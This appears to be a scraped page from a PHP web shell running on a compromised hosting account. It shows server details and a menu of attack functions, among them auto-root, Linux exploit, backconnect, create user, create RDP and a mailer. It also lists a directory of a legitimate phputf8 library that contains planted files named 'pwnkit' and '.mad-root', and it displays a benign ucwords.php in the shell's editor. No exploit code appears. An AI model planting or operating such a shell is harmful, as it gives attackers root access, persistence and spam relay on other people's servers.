Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
phputf8 /
[ HOME SHELL ]
Name
Size
Permission
Action
mbstring
[ DIR ]
drwxr-xr-x
native
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
25.81
KB
-rw-r--r--
README
3.29
KB
-rw-r--r--
ord.php
2.35
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
str_ireplace.php
1.95
KB
-rw-r--r--
str_pad.php
1.67
KB
-rw-r--r--
str_split.php
824
B
-rw-r--r--
strcasecmp.php
546
B
-rw-r--r--
strcspn.php
894
B
-rw-r--r--
stristr.php
855
B
-rw-r--r--
strrev.php
458
B
-rw-r--r--
strspn.php
923
B
-rw-r--r--
substr_replace.php
600
B
-rw-r--r--
trim.php
2.18
KB
-rw-r--r--
ucfirst.php
787
B
-rw-r--r--
ucwords.php
1.44
KB
-rw-r--r--
utf8.php
2.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ucwords.php
<?php /** * @version $Id$ * @package utf8 * @subpackage strings */ //--------------------------------------------------------------- /** * UTF-8 aware alternative to ucwords * Uppercase the first character of each word in a string * Note: requires utf8_substr_replace and utf8_strtoupper * @param string * @return string with first char of each word uppercase * @see http://www.php.net/ucwords * @package utf8 * @subpackage strings */ function utf8_ucwords($str) { // Note: [\x0c\x09\x0b\x0a\x0d\x20] matches; // form feeds, horizontal tabs, vertical tabs, linefeeds and carriage returns // This corresponds to the definition of a "word" defined at http://www.php.net/ucwords $pattern = '/(^|([\x0c\x09\x0b\x0a\x0d\x20]+))([^\x0c\x09\x0b\x0a\x0d\x20]{1})[^\x0c\x09\x0b\x0a\x0d\x20]*/u'; return preg_replace_callback($pattern, 'utf8_ucwords_callback',$str); } //--------------------------------------------------------------- /** * Callback function for preg_replace_callback call in utf8_ucwords * You don't need to call this yourself * @param array of matches corresponding to a single word * @return string with first char of the word in uppercase * @see utf8_ucwords * @see utf8_strtoupper * @package utf8 * @subpackage strings */ function utf8_ucwords_callback($matches) { $leadingws = $matches[2]; $ucfirst = utf8_strtoupper($matches[3]); $ucword = utf8_substr_replace(ltrim($matches[0]),$ucfirst,0,1); return $leadingws . $ucword; }
Close